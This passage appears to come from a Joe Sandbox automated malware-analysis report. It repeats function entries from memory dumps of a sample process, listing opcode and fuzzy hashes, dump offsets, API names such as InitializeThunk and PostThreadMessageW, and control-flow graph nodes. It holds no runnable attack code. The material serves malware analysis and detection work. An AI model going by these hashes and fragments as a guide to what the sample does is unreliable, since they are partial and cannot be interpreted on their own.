                                                                                  • Instruction Fuzzy Hash: B590027120140812D1807158840865B0015C7D1381F95C019A5025654DCA168B5D77A1
                                                                                  Function 02F52BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                  • Instruction ID: 89a3c2d78a0a6ceb4ac2057b31f4e7ea35b98db82cd3bb27d6ad33adfb2b772f
                                                                                  • Opcode Fuzzy Hash: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                  • Instruction Fuzzy Hash: 8F90027120544852D14071588408A570025C7D0385F55C015A5064694D96268E59B661
                                                                                  Function 02F52BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                  • Instruction ID: 4fa97e9be4aefabeafca2329e5a85b750fdea643ae824063e2ec48dab5c1ae37
                                                                                  • Opcode Fuzzy Hash: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                  • Instruction Fuzzy Hash: DB90027160540812D150715884187570015C7D0381F55C015A5024654D87568B5976A1
                                                                                  Function 02F52B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a2a84bc78bc7796fab709d5ab682f3cef0fcfdead3a97fa8393fa7516b4dee23
                                                                                  • Instruction ID: 65482c9b0b652e7dcc5a0f27c4f8d511055fbb2e0967d2417f352881fed67827
                                                                                  • Opcode Fuzzy Hash: a2a84bc78bc7796fab709d5ab682f3cef0fcfdead3a97fa8393fa7516b4dee23
                                                                                  • Instruction Fuzzy Hash: C29002A120240013410571588418627401AC7E0281B55C025E6014590DC52689956125
                                                                                  Function 02F52EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                  • Instruction ID: 32400a6bbb5abb7cba4e54b87e49f1f87c53197ffd700f3cc1584bd865ec5323
                                                                                  • Opcode Fuzzy Hash: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                  • Instruction Fuzzy Hash: A29002A120180413D140755888086170015C7D0382F55C015A7064555E8A2A8D556135
                                                                                  Function 02F52E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                  • Instruction ID: d2314a58ad9cac7509259bd10e5f0c7ba189605dae8435e54b82dc29f46f30cf
                                                                                  • Opcode Fuzzy Hash: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                  • Instruction Fuzzy Hash: 1890026160140512D10171588408627001AC7D02C1F95C026A6024555ECA268A96A131
                                                                                  Function 02F52FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                  • Instruction ID: 7871af7120aed2198d8362311d5d7750803c14f2102dfe6d68af1b15941a14c4
                                                                                  • Opcode Fuzzy Hash: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                  • Instruction Fuzzy Hash: 1F900261211C0052D20075688C18B170015C7D0383F55C119A5154554CC91689655521
                                                                                  Function 02F52FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                  • Instruction ID: 1c4062bd518a3475ddb63f8d394ff504e74e2cac73053e4b5ba2c160aa1b9cf6
                                                                                  • Opcode Fuzzy Hash: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                  • Instruction Fuzzy Hash: E49002616014005241407168C8489174015EBE1291755C125A5998550D855A89695665
                                                                                  Function 02F52F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                  • Instruction ID: 17f2daef2404eb9418128504c42eaab271fc60962944ea59d058feb4d1875410
                                                                                  • Opcode Fuzzy Hash: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                  • Instruction Fuzzy Hash: EB9002A134140452D10071588418B170015C7E1381F55C019E6064554D861ACD566126
                                                                                  Function 02F52CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 76d3ccb86599757541a390ee8cd277f961292a48bb826774922335713879f99b
                                                                                  • Instruction ID: 8421f33f877c92231958ca8f8683003d0eeb83b032a886136bbe4de2745051d1
                                                                                  • Opcode Fuzzy Hash: 76d3ccb86599757541a390ee8cd277f961292a48bb826774922335713879f99b
                                                                                  • Instruction Fuzzy Hash: 2F90027120140412D1007598940C6570015C7E0381F55D015AA024555EC66689956131
                                                                                  Function 02F52C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 65018cc7bf26631e2d7d116d622047983cc59627f844b8c263e375893e395278
                                                                                  • Instruction ID: 9c129e3d85f65b65fa391d44a3871bf91c88495263d119b8aa3c5ca20e47609e
                                                                                  • Opcode Fuzzy Hash: 65018cc7bf26631e2d7d116d622047983cc59627f844b8c263e375893e395278
                                                                                  • Instruction Fuzzy Hash: F590027120148812D1107158C40875B0015C7D0381F59C415A9424658D869689957121
                                                                                  Function 02F52C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8f2595d08a3223cc164e93f57da595dc0c5d5793f6ac4a91a81c3786c3133c8c
                                                                                  • Instruction ID: acaae6db2da403c1e81e37ec00a15c72a62e9c881751211d3641264d7ba62c56
                                                                                  • Opcode Fuzzy Hash: 8f2595d08a3223cc164e93f57da595dc0c5d5793f6ac4a91a81c3786c3133c8c
                                                                                  • Instruction Fuzzy Hash: 2D90027120140852D10071588408B570015C7E0381F55C01AA5124654D8616C9557521
                                                                                  Function 02F52DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 577801e3011b5d3fac556d927851d2b00a1012a1fe58965e19ed6e1bacc2fb2f
                                                                                  • Instruction ID: 39558fc426485b5565a94b021d344ff492192d646055543e093fd7182b86f069
                                                                                  • Opcode Fuzzy Hash: 577801e3011b5d3fac556d927851d2b00a1012a1fe58965e19ed6e1bacc2fb2f
                                                                                  • Instruction Fuzzy Hash: 3190027120140423D111715885087170019C7D02C1F95C416A5424558D96578A56A121
                                                                                  Function 02F52DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0524a7b57e32530b5ae53d74c633eea137bfa368f46802b485188d2c2c8f75c7
                                                                                  • Instruction ID: fbd9fb9a67eff717a572840efb762a46119cbad8cc9e67c7cf4abb594d2e2e51
                                                                                  • Opcode Fuzzy Hash: 0524a7b57e32530b5ae53d74c633eea137bfa368f46802b485188d2c2c8f75c7
                                                                                  • Instruction Fuzzy Hash: F2900261242441625545B15884085174016D7E02C1795C016A6414950C8527995AD621
                                                                                  Function 02F52D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d9bc3e9d8f36fa06742cb7895451e3207e2d1d98f96e85bf6a8ddf1b0cdb7361
                                                                                  • Instruction ID: 11cfc40db8c3f365a32ca68d748a5bd454f28d296ea1a24a8e4371d0847b5671
                                                                                  • Opcode Fuzzy Hash: d9bc3e9d8f36fa06742cb7895451e3207e2d1d98f96e85bf6a8ddf1b0cdb7361
                                                                                  • Instruction Fuzzy Hash: A990047130140013D140715CD41C7174015D7F13C1F55D015F5414554CDD17CD5F5333
                                                                                  Function 02F52D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1669be1f1cf2bf50b22a71ea46eb3b62669b63e3abb6cd7b59ab893d7810dd8b
                                                                                  • Instruction ID: 96308e0ac40de5f86d689363c3d995bf5989ffa7ee85d3cb1980ba4f6b8da76a
                                                                                  • Opcode Fuzzy Hash: 1669be1f1cf2bf50b22a71ea46eb3b62669b63e3abb6cd7b59ab893d7810dd8b
                                                                                  • Instruction Fuzzy Hash: 8690026921340012D1807158940C61B0015C7D1282F95D419A5015558CC916896D5321
                                                                                  Function 02F535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0042f55688dfffcf431ac64d41c3d126fa53c34ca7d486da1877a716f6e229e5
                                                                                  • Instruction ID: 90da9614664562e0fdcdd7217199530707dfbbd8c8d93cd50c991b635d5c7b37
                                                                                  • Opcode Fuzzy Hash: 0042f55688dfffcf431ac64d41c3d126fa53c34ca7d486da1877a716f6e229e5
                                                                                  • Instruction Fuzzy Hash: 8D90027160550412D100715885187171015C7D0281F65C415A5424568D87968A5565A2
                                                                                  Function 02F539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5b8d1bc2bb6f9fc972a14b83de10a8462844183e3bfc9902ec64e086c5eb8d61
                                                                                  • Instruction ID: 703f796adefde469630e8ee17b7b50a2cb1dbb01344348471de833ab7be89e05
                                                                                  • Opcode Fuzzy Hash: 5b8d1bc2bb6f9fc972a14b83de10a8462844183e3bfc9902ec64e086c5eb8d61
                                                                                  • Instruction Fuzzy Hash: ED90026124545112D150715C84086274015E7E0281F55C025A5814594D855689596221
                                                                                  Function 006D0EF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 382 6d0ef7-6d0f09 383 6d0f4b-6d0f54 382->383 384 6d0f0b-6d0f1d 382->384 385 6d0f1f-6d0f26 384->385 386 6d0f76-6d0f7f 384->386 389 6d0f27-6d0f43 385->389 387 6d0f85-6d0fca call 6d4730 call 6c13e0 call 6e1e60 386->387 388 6d0f80 call 6ec1a0 386->388 397 6d0fcc-6d0fdb PostThreadMessageW 387->397 398 6d0fea-6d0ff0 387->398 388->387 389->383 397->398 399 6d0fdd-6d0fe7 397->399 399->398
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: dff3c99ebe8f82e78cd61e7552ec5033fbfb9b47d96495e17cfd6294eb1bd34a
                                                                                  • Instruction ID: 1470a9ec1bd6041f0189324cc9388d38049c56dfcb922f3a4396d98b39bbf9de
                                                                                  • Opcode Fuzzy Hash: dff3c99ebe8f82e78cd61e7552ec5033fbfb9b47d96495e17cfd6294eb1bd34a
                                                                                  • Instruction Fuzzy Hash: 2221CEB29092597B9B1157B81C819FEBB6DDF42370F1482AFEC94DB382D2254D0383D1
                                                                                  Function 006D0F5D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 400 6d0f5d-6d0fca call 6eb790 call 6ec1a0 call 6d4730 call 6c13e0 call 6e1e60 413 6d0fcc-6d0fdb PostThreadMessageW 400->413 414 6d0fea-6d0ff0 400->414 413->414 415 6d0fdd-6d0fe7 413->415 415->414
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 1f2d35f3733551a780787f5eda6c898a51f723e0808061f033a263329ac30ce1
                                                                                  • Instruction ID: 153c83d887617fc0ddcd55be2de0db61283f651898437ed4f6c0691264e01836
                                                                                  • Opcode Fuzzy Hash: 1f2d35f3733551a780787f5eda6c898a51f723e0808061f033a263329ac30ce1
                                                                                  • Instruction Fuzzy Hash: F301C8B2D4125C7AEB11AAE54C82DEF7B7DDF41794F048069F904A7241D6349E0647A1
                                                                                  Function 006D0F60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 416 6d0f60-6d0fca call 6eb790 call 6ec1a0 call 6d4730 call 6c13e0 call 6e1e60 428 6d0fcc-6d0fdb PostThreadMessageW 416->428 429 6d0fea-6d0ff0 416->429 428->429 430 6d0fdd-6d0fe7 428->430 430->429
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: bb05a244c4477c3993dd5ddde349af8bd930d90ac3fdf40f86e1ebf393e129e9
                                                                                  • Instruction ID: 4870b773332b0ea253c0d921a368e40687ca8b0a40511b5103ac42dc5f0ba7ed
                                                                                  • Opcode Fuzzy Hash: bb05a244c4477c3993dd5ddde349af8bd930d90ac3fdf40f86e1ebf393e129e9
                                                                                  • Instruction Fuzzy Hash: D901D6B2D0125C7BEB10ABE58C82DEF7B7CEF41794F008069FA04A7241D6345E0687B1
                                                                                  Function 006D0EE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 431 6d0ee4-6d0fca call 6eb790 call 6ec1a0 call 6d4730 call 6c13e0 call 6e1e60 443 6d0fcc-6d0fdb PostThreadMessageW 431->443 444 6d0fea-6d0ff0 431->444 443->444 445 6d0fdd-6d0fe7 443->445 445->444
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
